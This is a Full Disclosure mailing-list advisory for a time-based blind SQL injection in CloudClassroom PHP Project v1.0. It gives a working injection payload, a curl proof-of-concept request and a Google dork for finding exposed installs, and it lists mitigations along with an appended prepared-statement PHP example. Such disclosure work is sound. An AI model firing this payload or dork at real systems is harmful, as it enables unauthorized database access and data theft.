Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project
Affected Version: v1.0
Vulnerability Type: SQL Injection
Attack Type: Remote
CVE ID: CVE-2025-45542
Discoverer: Sanjay Singh

Vulnerability Details:
A time-based blind SQL injection vulnerability exists in the
`registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass`
parameter is not properly sanitized, allowing an unauthenticated remote
attacker to manipulate backend SQL logic and potentially extract sensitive
information.

Proof of Concept:
The vulnerability can be exploited using a POST request with a crafted
payload like:
`'XOR(if(now()=sysdate(),sleep(6),0))XOR'`

Impact:
Successful exploitation allows for:
- Arbitrary SQL execution
- Potential information disclosure
- Authentication bypass under certain conditions

Recommended Mitigations:
- Use prepared statements with parameterized queries
- Sanitize input with `mysqli_real_escape_string()` or similar
- Implement a Web Application Firewall (WAF)
- Enforce least privilege on the application’s DB user

References:
- GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project
- Exploit-DB Submission (pending approval)
- GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master" intitle:"Cloud Classroom"`

I have also submitted this to Exploit-DB and the Google Hacking Database to
assist defenders and researchers.

Attached is a detailed advisory in plain text format.

Regards,
Sanjay Singh
https://www.linkedin.com/in/sanjay70023

https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966
# Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL Injection (pass parameter)
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542

# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by
# sending a malicious POST request to delay server response and infer data.

# PoC Request (simulated using curl):

curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=test...@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

# The server response will be delayed if the SQL condition is true,
# confirming the injection point.
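
The prepared-statement and least-privilege mitigations listed above, sketched as an added example that is not part of the original post or the project's code. The table and column names, the `cc_app` database account, the `CC_DB_PASS` environment variable and the function names are hypothetical, since the advisory does not show the project's schema or query.

```php
<?php
// Added example; not CloudClassroom code. Table, column and account names are
// hypothetical because the advisory does not show the project's schema.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors throw

function open_db(): mysqli
{
    // Least privilege: this account is assumed to hold only what registration
    // needs, e.g. GRANT SELECT, INSERT ON classroom.* TO 'cc_app'@'localhost';
    $db = new mysqli('localhost', 'cc_app', getenv('CC_DB_PASS') ?: '', 'classroom');
    $db->set_charset('utf8mb4');
    return $db;
}

// BEFORE: a string-built query of the kind that produces this class of bug
// (assumed shape; the advisory does not show the project's query):
//   $sql = "INSERT INTO student (email, pass) VALUES ('$email', '$pass')";
//   $db->query($sql);  // a quote in $pass ends the literal and becomes SQL

function register_student(mysqli $db, array $form): bool
{
    $email = filter_var($form['email'] ?? '', FILTER_VALIDATE_EMAIL);
    $pass  = $form['pass'] ?? null;
    if ($email === false || !is_string($pass) || $pass === '' || strlen($pass) > 128) {
        return false; // reject malformed input before touching the database
    }

    // Store a hash, never the submitted string itself.
    $hash = password_hash($pass, PASSWORD_DEFAULT);

    // AFTER: placeholders keep every submitted value out of the SQL text, so
    // quotes and function calls inside a field are stored as plain data.
    $stmt = $db->prepare('INSERT INTO student (email, pass) VALUES (?, ?)');
    $stmt->bind_param('ss', $email, $hash);
    return $stmt->execute();
}

// Minimal handler wiring for a web request; skipped when run from the CLI.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    http_response_code(register_student(open_db(), $_POST) ? 201 : 400);
}
```

With the query parameterized, a request like the PoC above should return in normal time; a response that still stalls for the sleep interval points to another string-built query on the same code path.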
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/